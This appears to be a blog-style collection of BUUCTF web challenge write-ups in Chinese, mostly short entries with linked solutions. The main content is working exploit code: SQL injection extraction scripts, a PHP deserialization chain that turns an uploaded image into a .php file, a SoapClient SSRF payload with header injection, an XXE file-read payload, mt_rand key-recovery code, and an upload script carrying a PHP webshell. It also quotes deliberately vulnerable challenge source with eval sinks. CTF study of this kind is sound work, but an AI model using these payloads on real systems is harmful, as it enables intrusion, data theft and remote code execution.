 

[PHP知识库]Buuctf之Web(四)

[HFCTF2020]JustEscape

WP

vm2沙盒逃逸

涉及到 nodejs，暂时不会

[网鼎杯2018]Unfinish

脚本（通过注册时的 username 做二次注入，登录后从页面回显中逐字符读出 flag）

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/9/10 14:38
#coding:utf-8
import requests
from bs4 import BeautifulSoup
import time

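url = 'http://f8933a3b-5f22-4bde-bde9-7a49c4b1f0a4.node4.buuoj.cn:81/'

# Upper bound on the flag length; the loop also stops at the first 0 returned
# by the oracle (ascii('') past the end of the string).
MAX_LEN = 100
TIMEOUT = 10


def build_payload(pos):
    """Return the username that leaks character *pos* (1-based) of ``flag``.

    The username is stored at registration and rendered back by index.php,
    so this is a second-order (stored) injection: the quotes close the
    string in the INSERT and the numeric expression
    ``0 + ascii(substr(...)) + 0`` is what ends up stored and displayed.
    The caller reads the displayed number back as the character code.
    """
    return "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(pos)


def leak_char(base_url, pos, timeout=TIMEOUT):
    """Register a throw-away account carrying the probe for *pos*, log in,
    and return the integer index.php shows in its first ``<span>``.

    Returns 0 when the page has no parsable number there, so a missing or
    non-numeric span ends the extraction instead of raising (the original
    script crashed on that case).
    """
    account = 'abc{}@qq.com'.format(pos - 1)   # same account names as the original run
    register = {'email': account, 'username': build_payload(pos), 'password': '123456'}
    login = {'email': account, 'password': '123456'}
    with requests.session() as sess:
        sess.post(base_url + 'register.php', data=register, timeout=timeout)
        sess.post(base_url + 'login.php', data=login, timeout=timeout)
        page = sess.post(base_url + 'index.php', timeout=timeout).text
    span = BeautifulSoup(page, 'html.parser').span
    shown = (span.string or '').strip() if span is not None else ''
    return int(shown) if shown.isdigit() else 0


def extract_flag(base_url=url, max_len=MAX_LEN):
    """Leak the flag one character per account; stop at the first 0 (end of string)."""
    chars = []
    for pos in range(1, max_len + 1):
        code = leak_char(base_url, pos)
        if code == 0:
            break
        chars.append(chr(code))
        print(''.join(chars))
        time.sleep(1)   # be gentle with the shared CTF instance
    return ''.join(chars)


if __name__ == '__main__':
    m = extract_flag()
    print(m)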

[MRCTF2020]Ezaudit

考点是 mt_rand 的种子：mt_rand 是伪随机，和之前的一个伪随机题目做法一模一样。

总结:

先计算种子:

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/9/10 14:38

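# Step 1 of recovering the private key from the public key: turn the observed
# public key into the per-output constraints php_mt_seed needs to brute-force
# the mt_srand() seed.
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
str2 = 'KVQP0LdJKRaV3n9D'   # the 16-character "public key" shown by the challenge


def php_mt_seed_query(sample, alphabet=str1):
    """Translate an mt_rand-derived string into php_mt_seed's command-line input.

    The target builds each key character as ``alphabet[mt_rand(0, len-1)]``,
    so every character pins one mt_rand() output to a single index.  For each
    character this emits ``idx idx 0 len-1`` -- the observed value range
    followed by the mt_rand(min, max) bounds -- which is the four-number form
    php_mt_seed accepts for a ranged output.  Characters absent from
    *alphabet* are skipped silently, exactly like the original loop, so the
    alphabet must match the target's or the constraints will be wrong.
    Returns a space-separated string with a trailing space.
    """
    top = len(alphabet) - 1
    parts = []
    for ch in sample:
        idx = alphabet.find(ch)
        if idx < 0:
            continue
        parts.append('{0} {0} 0 {1} '.format(idx, top))
    return ''.join(parts)


res = php_mt_seed_query(str2)
print(res)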

配合 php_mt_seed 把种子爆破出来

再计算私钥:

<?php
// Step 2 of recovering the private key: once php_mt_seed has found the seed,
// seeding the generator with it replays the exact mt_rand() sequence the
// target used, so the calls below reproduce both keys.
mt_srand(1775196155);
/**
 * Build the 16-character "public key" exactly the way the challenge does.
 *
 * Each character is alphabet[mt_rand(0, 61)], so the whole string is a pure
 * function of the mt_srand() seed.  mt_rand() is not a CSPRNG, which is why
 * one observed key is enough to recover the seed and replay the private key.
 * Consumes $length outputs of mt_rand(); the call order relative to
 * private_key() matters.
 *
 * @param int $length number of characters (16 in the challenge)
 * @return string
 */
function public_key($length = 16) {
    $alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $last = strlen($alphabet) - 1;
    $chars = array();
    while (count($chars) < $length) {
        $chars[] = $alphabet[mt_rand(0, $last)];
    }
    return implode('', $chars);
}
/**
 * Build the 12-character "private key" the same way the challenge does.
 *
 * Same alphabet and same mt_rand(0, 61) draw as public_key(); with the seed
 * known, calling public_key() first (to consume the 16 draws the target
 * spent) and then this function reproduces the target's private key.
 * Nothing here is secret-safe: mt_rand() output is predictable by design.
 *
 * @param int $length number of characters (12 in the challenge)
 * @return string
 */
function private_key($length = 12) {
	$alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
	$lastIndex = strlen($alphabet) - 1;
	$key = '';
	for ($n = 0; $n < $length; $n++) {
		$key .= $alphabet[mt_rand(0, $lastIndex)];
	}
	return $key;
}
// Same call order as the target (public key first, then private key) so the
// mt_rand() stream lines up.  The labels are the original's GBK text:
// "this is the public key" / "this is the private key".
echo "ÕâÊǹ«Ô¿:".public_key()."</br>";
echo "ÕâÊÇ˽Կ:".private_key()."</br>";
?> 

[强网杯 2019]Upload

一条反序列化链子；简单看了一下网上的 wp，感觉少了点东西。

首先:

找到这个文件上传检测，或者与这个文件上传有关的点，也就是 Profile 这个子类；以及会认为这是反序列化题目的原因，在这里：

image-20211106112233632

跟踪这个函数:

// Where the chain starts: the 'user' cookie is attacker-controlled, base64-decoded
// and passed straight to unserialize(), so any class the autoloader can reach
// becomes a gadget; the magic methods quoted below are what the exploit chains.
public function login_check(){
        $profile=cookie('user');
        if(!empty($profile)){
            $this->profile=unserialize(base64_decode($profile));
            $this->profile_db=db('user')->where("ID",intval($this->profile['ID']))->find();
            if(array_diff($this->profile_db,$this->profile)==null){// Compares the values of the two arrays and returns the difference, i.e. the login data must agree with the DB row -- not the bug itself, just a login check. Note the loose `== null`: an empty array compares equal to null, and array_diff compares values as strings.
                return 1;
            }else{
                return 0;
            }
        }
    }

同时在此 php 文件中可以利用 construct 给其赋值为 0，直接不经过此 if 的判断

它会把你 cookie 中 user 的值先 base64 解码然后反序列化，其中导致出现漏洞的代码是：

if($this->ext) {
            if(getimagesize($this->filename_tmp)) {
                @copy($this->filename_tmp, $this->filename);
                @unlink($this->filename_tmp);
                $this->img="../upload/$this->upload_menu/$this->filename";
                $this->update_img();
            }else{
                $this->error('Forbidden type!', url('../index'));
            }
        }else{
            $this->error('Unknow file type!', url('../index'));
        }
    }

这是它文件上传的特色：会将文件重命名（copy 到 $this->filename），导致后期我们可以把已上传的 jpg/png 改为 php 文件

那么下面就是如何调用 upload_img 这个函数了，在本页的末尾有两个魔术方法：

public function __get($name)// fires on a read of an inaccessible or undefined property
    {
        // Answered from the $except array, so a controlled 'except' decides what
        // any missing property evaluates to.  Together with __call() below this
        // is the dispatch gadget the exploit relies on.
        return $this->except[$name];
    }

public function __call($name, $arguments)// fires on a call to an undefined method
    {
        // $this->{$name} on a property that does not exist goes through __get(),
        // i.e. except[$name]; if that is truthy, the method *named by that value*
        // is invoked with the original arguments (the exploit sets
        // except['index'] = 'upload_img', turning index() into upload_img()).
        if($this->{$name}){
            $this->{$this->{$name}}($arguments);
        }
    }

有这两个方法的存在，那么调用本页的函数就不成问题；再继续寻找能触发该页面 __call 的方法，需要在同一个命名空间里面，所以很快就找到了：

public function __destruct()// runs when the object is freed, e.g. right after login_check() discards the unserialized value
    {
        // Unless 'registed' is truthy, calls index() on whatever 'checker' holds;
        // with checker pointing at a Profile, index() is presumably undefined on
        // Profile and lands in its __call() above -- the link the exploit uses.
        if(!$this->registed){
            $this->checker->index();
        }
    }

exp:

<?php
namespace app\web\controller;
use think\Controller;
/**
 * Gadget stub for the target's Profile controller: only the properties the chain
 * reads need to exist, and they must serialize under the same names (same
 * namespace, public visibility) as the real class.
 */
class Profile{
    public $checker = 0;   // 0 per the writeup, to skip a check in the target's Profile -- confirm against the original class
    public $filename_tmp = '../public/upload/fb7714fd023d486ddc9939267763bc21/a4a2c22c85451e94294fac2ec87c48c2.png';   // image uploaded earlier; must pass getimagesize()
    public $filename = '../public/upload/fb7714fd023d486ddc9939267763bc21/yn8rt.php';   // destination: upload_img copies tmp -> here, yielding a .php file
    public $ext = 1;   // truthy so upload_img takes its `if($this->ext)` branch
    public $except = array('index' => 'upload_img');   // __get('index') -> 'upload_img', so __call('index') dispatches to upload_img()
}
/**
 * Outer gadget.  The target's Register::__destruct() (quoted above) calls
 * $this->checker->index() whenever $registed is falsy, so pointing $checker at
 * a Profile turns object destruction into Profile->index() and from there into
 * Profile::__call().  This stub defines no magic methods itself; it only has
 * to serialize into the property names the real class reads.
 */
class Register{
    public $checker;
    public $registed;   // left null, so !$this->registed is true in the target's __destruct()
    public function __construct()
    {
        $this->checker=new Profile();
    }
}
// base64(serialize(Register)) is the value to place in the 'user' cookie that
// login_check() base64-decodes and unserializes.
$o = new Register();
echo base64_encode(serialize($o))
?>

[GYCTF2020]Easyphp

https://johnfrod.top/ctf/gyctf2020easyphp/

[GXYCTF2019]StrongestMind

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/9/10 14:38
from requests import *
import re
import time

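BASE_URL = "http://f7ec9408-bbeb-4a20-9e38-e4d90de04744.node4.buuoj.cn:81/"
ROUNDS = 1005     # follow-up answers after the first one, as in the original run
TIMEOUT = 10

# Same shape the original regex tolerated: two integers around a + or - sign
# with any single character (the page uses a space) on either side of the sign.
_EXPR = re.compile(r'(\d+).([+-]).(\d+)')


def solve_expression(text):
    """Find the first ``A + B`` / ``A - B`` in *text* and return its integer value.

    Returns None when no expression is present.  The original passed the regex
    match to ``eval()``, i.e. it executed text taken from an HTTP response;
    parsing the three groups and doing the arithmetic here means the server
    can no longer run code on the solver's machine.
    """
    match = _EXPR.search(text)
    if match is None:
        return None
    left, op, right = int(match.group(1)), match.group(2), int(match.group(3))
    return left + right if op == '+' else left - right


def answer_loop(base_url=BASE_URL, rounds=ROUNDS, timeout=TIMEOUT):
    """Fetch the first problem, then keep answering in one session.

    Sends ``rounds + 1`` answers in total (the original answered once outside
    its loop and ``rounds`` times inside it) and returns the last response
    body, where the flag is printed once enough answers are correct.  A
    response without an expression stops the loop; a failed request is
    reported and skipped instead of being swallowed by a bare ``except``.
    """
    s = session()
    page = s.get(base_url, timeout=timeout).text
    for i in range(rounds + 1):
        value = solve_expression(page)
        if value is None:
            print("no expression found in response, stopping")
            break
        try:
            page = s.post(base_url + "index.php", data={"answer": value}, timeout=timeout).text
        except Exception as exc:   # top-level boundary of the script: report and move on
            print("round {} failed: {}".format(i, exc))
            continue
        print(value)
        print(i)
        time.sleep(0.5)
    return page


if __name__ == "__main__":
    print(answer_loop())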

[SCTF2019]Flag Shop

https://www.freesion.com/article/9299639089/

[SUCTF 2018]GetShell

利用取反写木马来实现绕过

WP

bestphp’s revenge

利用 SoapClient 来实现 SSRF

<?php
// SSRF via SoapClient: in non-WSDL mode (first argument null) the object does no
// network I/O when constructed, only when a method is invoked on it, so it
// survives serialize() and the request fires later when the unserialized copy
// is called (the writeup's follow-up steps use call_user_func for that).
// 'location' is the URL the SOAP POST is sent to -- here an internal endpoint.
$target = "http://127.0.0.1/flag.php";
// The "\r\n" inside user_agent is CRLF injection into the request headers: the
// text after it becomes a separate "Cookie:" header line, so the internal
// request carries the attacker's PHPSESSID.  'uri' just needs to be non-empty.
$attack = new SoapClient(null,array('location' => $target,
    'user_agent' => "yn8rt\r\nCookie: PHPSESSID=l6ne21akbgdv48jff5h53go5i6\r\n",
    'uri' => "123"));
// Serialize and URL-encode so the object can travel inside a query parameter.
$payload = urlencode(serialize($attack));
echo $payload;
?>
    ?name=|O%3A10%3A%22SoapClient%22%3A4%3A%7Bs%3A3%3A%22uri%22%3Bs%3A3%3A%22123%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A11%3A%22_user_agent%22%3Bs%3A53%3A%22yn8rt%0D%0ACookie%3A+PHPSESSID%3Dl6ne21akbgdv48jff5h53go5i6%0D%0A%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D&f=session_start
	serialize_handler=php_serialize
    ?f=extract
    b=call_user_func

[b01lers2020]Life on Mars

没看明白

[安洵杯 2019]不是文件上传

strrchr() 函数：查找字符串在另一个字符串中最后一次出现的位置，并返回从该位置到字符串结尾的所有字符。

WP

[ISITDTU 2019]EasyPHP

WP

利用异或再异或绕过字符数限制

[GYCTF2020]Ez_Express

学习 JavaScript 这一篇就够了

JS 原型链污染初探

具体参考 p 师傅的文章：
初探 JavaScript 原型链污染

WP1

原型链污染

[RoarCTF 2019]Online Proxy

X-Forwarded-For 注入

二次注入

盲注

WP

[CSAWQual 2019]Web_Unagi

XXE 的绕过

<?xml version='1.0'?>
<!-- Classic XXE: the DOCTYPE declares an external entity backed by file:///flag and
     &xxe; inside <intro> makes the parser inline that file's contents into the
     field, which the application presumably displays back.  The single-quoted
     version='1.0' (instead of the usual double quotes) is presumably the "bypass"
     the heading refers to; confirm against the target's filter. -->
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
</users>

[HarekazeCTF2019]Avatar Uploader 1

WP

[GKCTF 2021]easycms

任意文件下载漏洞

WP

[BSidesCF 2019]SVGMagic

XXE 漏洞

WP

[EIS 2019]EzPOP

WP

[N1CTF 2018]eating_cms

WP

[SWPU2019]Web4

WP

[FireshellCTF2020]Caas

WP

[极客大挑战 2020]Roamphp1-Welcome

WP

[GXYCTF2019]BabysqliV3.0

<?php
error_reporting(0);
/*
 * Challenge source (the target, not the exploit).  Sinks worth knowing:
 *   - __destruct() eval()s $this->cmd, and upload() builds $this->cmd by
 *     concatenating $this->Filename into PHP source;
 *   - Filename is taken verbatim from $_GET['name'] whenever the blacklist in
 *     the constructor does not match;
 *   - __toString() returns Filename, and the entry code below hands the object
 *     to file_get_contents(), so Filename is also used as a path / stream URL.
 */
class Uploader{
	public $Filename;
	public $cmd;
	public $token;
	

	function __construct(){// constructor
		$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
		$ext = ".txt";
		@mkdir($sandbox, 0777, true);
		// Original comment: "if name is set, also block pseudo-protocols".
		// NOTE(review): there is no /x modifier, so the spaces around each '|'
		// are literal; the alternatives are "data:// ", " filter:// ", " php:// "
		// and " ." -- a "php://" with no trailing space, any "phar://", and a
		// dot not preceded by a space all get through.
		if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
			$this->Filename = $_GET['name'];// attacker-controlled
		}
		else{
			$this->Filename = $sandbox.$_SESSION['user'].$ext;// otherwise derived from the session
		}

		$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
		$this->token = $_SESSION['user'];
	}

	function upload($file){
		// NOTE(review): $sandbox and $ext were locals of __construct, never
		// globals, so these bind to undefined variables (and are unused here).
		global $sandbox;
		global $ext;

		// The original comment said "must not start with a digit or letter", but
		// '[' and ']' are taken as the PCRE delimiters here, so the pattern is the
		// literal ^a-z0-9 -- it only rejects names that begin with the text
		// "a-z0-9" and is otherwise a no-op.
		if(preg_match("[^a-z0-9]", $this->Filename)){
			$this->cmd = "die('illegal filename!');";
		}
		else{
			if($file['size'] > 1024){ // 1024 bytes, i.e. 1 KiB (not 1 MB as the original comment claimed)
				$this->cmd = "die('you are too big (a€2a¨C?`?€?)');";
			}
			else{
				// Builds PHP source for the eval() in __destruct by string
				// concatenation; a single quote inside Filename closes the
				// literal and whatever follows runs as code.
				$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";   // upload
			}
		}
	}

	function __toString(){
		global $sandbox;
		global $ext;
		// return $sandbox.$this->Filename.$ext;
		// String conversion yields the raw Filename, so file_get_contents($obj)
		// in the entry code reads whatever path or stream wrapper was supplied.
		return $this->Filename;
	}

	function __destruct(){
		// Loose (!=) comparison of the stored token with the current session
		// user; only when they differ is the command replaced by die().
		if($this->token != $_SESSION['user']){
			$this->cmd = "die('check token falied!');";
		}
		// Final sink: whatever upload() assembled into $cmd is executed.
		eval($this->cmd);
	}
}

// Request entry point: any upload drives the object above.  Passing the object
// to file_get_contents() invokes __toString(), i.e. reads from Filename; since
// "phar://" is not in the constructor's blacklist this is presumably also the
// route to unserialize() through phar metadata -- confirm the intended chain
// against the WP.
if(isset($_FILES['file'])) {
	$uploader = new Uploader();
	$uploader->upload($_FILES["file"]);
	if(@file_get_contents($uploader)){
		// The first echo's text is mojibake in the source; it is only a banner.
		echo "???¨¦?¡é??¡¥?? ????? ????¨C???????<br>".$uploader."<br>";
		echo file_get_contents($uploader);
	}
}

?>

[Black Watch 入群题]Web

异或盲注脚本

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/9/10 14:38
import requests

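flag = ''
BASE_URL = 'http://1f8818ec-5797-4bee-b46f-9ec71dac112a.node4.buuoj.cn:81/backend/content_detail.php?id='
# Text that appears in the JSON body only when the injected condition is true.
TRUE_MARKER = "Ôýʦ¸µÈ±¸öÅ®ÅóÓÑ"
TIMEOUT = 10
LOW, HIGH = 28, 137   # search window for one character code
MAX_LEN = 100

# Boolean-based blind injection through the ``id`` parameter: ``1^(cond)^1``
# is 1 (the real article) when cond is true and 0 otherwise, so the page body
# flips with the condition.  Each template takes (position, guess).
# database name  -> news
payload1 = '1^(ascii(substr((select(database())),{},1))>{})^1'

# table names    -> admin, contents
payload2 = '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'news\')),{},1))>{})^1'

# column names   -> admin: id, username, password, is_enable
#                   contents: id, title, content, is_enable
payload3 = '1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'contents\')),{},1))>{})^1'

# column values  -> the usernames in admin
payload4 = '1^(ascii(substr((select(group_concat(username))from(admin)),{},1))>{})^1'


def bisect_char(is_greater, low=LOW, high=HIGH):
    """Binary-search a character code with an oracle answering "char > guess".

    Returns the smallest code c in [low, high] for which ``is_greater(c)`` is
    False, i.e. the character itself when it lies inside the window, *low*
    when it is at or below the window (ascii('') == 0 past the end of the
    string gives exactly this), and *high* when it is above.
    """
    while low < high:
        mid = (low + high) // 2
        if is_greater(mid):
            low = mid + 1
        else:
            high = mid
    return low


def query(payload, pos, guess, base_url=BASE_URL, timeout=TIMEOUT):
    """Ask the target whether character *pos* of the selected value is > *guess*."""
    r = requests.get(base_url + payload.format(pos, guess), timeout=timeout)
    return TRUE_MARKER in str(r.json())


def leak(payload, max_len=MAX_LEN, base_url=BASE_URL):
    """Leak the value selected by *payload* one character at a time.

    Stops at the first position whose code collapses to the lower bound of the
    window, which is what happens past the end of the string.  (The original
    compared ``chr(mid) == ''``, which can never be true, so it always ran all
    100 rounds and appended control characters once the value was exhausted.)
    """
    out = []
    for pos in range(1, max_len + 1):
        code = bisect_char(lambda guess, p=pos: query(payload, p, guess, base_url))
        if code == LOW:
            break
        out.append(chr(code))
        print(''.join(out))
    return ''.join(out)


if __name__ == '__main__':
    flag = leak(payload4)
    print(flag)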

[SUCTF 2018]MultiSQL

WP

十进制绕过过滤写马

[RoarCTF 2019]Simple Upload

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/9/10 14:38
import requests
# url = 'http://f98099c2-262f-472c-8002-393f7a2b62fd.node4.buuoj.cn:81/index.php/Home/index/upload'
# file1 = {'file':open('1.txt','r')}
# file2 = {'file[]':open('php.php','r')}
# file3 = {'file':open('1.txt','r')}
# r=requests.post(url,files=file1)
# print(r.text)
# r=requests.post(url,files=file2)
# print(r.text)
# r=requests.post(url,files=file3)
# print(r.text)
# dir='abcdefghijklmnopqrstuvwxyz0123456789'
# for i in dir:
#     for j in dir:
#         for x in dir:
#             for y in dir:
#                 for z in dir:
#                     url='http://f98099c2-262f-472c-8002-393f7a2b62fd.node4.buuoj.cn:81/Public/Uploads/2021-11-18/61961de{}{}{}{}{}.txt'.format(i,j,x,y,z)
#                     r = requests.get(url)
#                     print(url)
#                     if r.status_code== 200:
#                         print(url)
#                         break
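# Method 2 (method 1 above brute-forced the stored file name instead).  The
# file is sent with the name "shell.<>php"; presumably the "<>" lets the name
# past the server's extension check while it is dropped when the file is
# stored, leaving a .php -- confirm against the original WP.
url = "http://f98099c2-262f-472c-8002-393f7a2b62fd.node4.buuoj.cn:81/index.php/home/index/upload/"
files = {"file": ("shell.<>php", "<?php eval($_GET['cmd'])?>")}


def upload(target=url, timeout=10):
    """POST the webshell as the multipart field ``file`` and return the response body.

    The original created a Session it never used and posted without a timeout;
    this uses one session for the request and bounds the wait.
    """
    with requests.Session() as s:
        return s.post(target, files=files, timeout=timeout).text


if __name__ == "__main__":
    print(upload())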

[CISCN2019 华东南赛区]Web4

wp

flask-session-manager 的使用

[SUCTF 2018]annonymous

wp

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/9/10 14:38
import requests
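BASE_URL = "http://4b101e75-e297-4884-98f3-52bd2aa1e4d9.node4.buuoj.cn:81/"
TIMEOUT = 10


def lambda_name(i):
    """Return the *i*-th anonymous-function name to try as ``func_name``.

    PHP's create_function() registers its result as "\\0lambda_N" (a leading
    NUL byte plus a counter), which is presumably what the challenge's
    func_name parameter resolves; the NUL is sent as %00 so it survives the
    query string.
    """
    return "%00lambda_{}".format(i)


def find_flag(base_url=BASE_URL, max_index=100, timeout=TIMEOUT):
    """Try counter values 0..max_index-1 and return the first body containing 'flag'.

    Returns None when no candidate hits.  Requests are bounded by *timeout*
    (the original had none).
    """
    for i in range(max_index):
        res = requests.get(base_url + "?func_name=" + lambda_name(i), timeout=timeout)
        if "flag" in res.text:
            return res.text
        print('loading....')
    return None


if __name__ == "__main__":
    body = find_flag()
    print(body if body is not None else "no lambda index hit within range")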

[GoogleCTF2019 Quals]Bnv

WP

 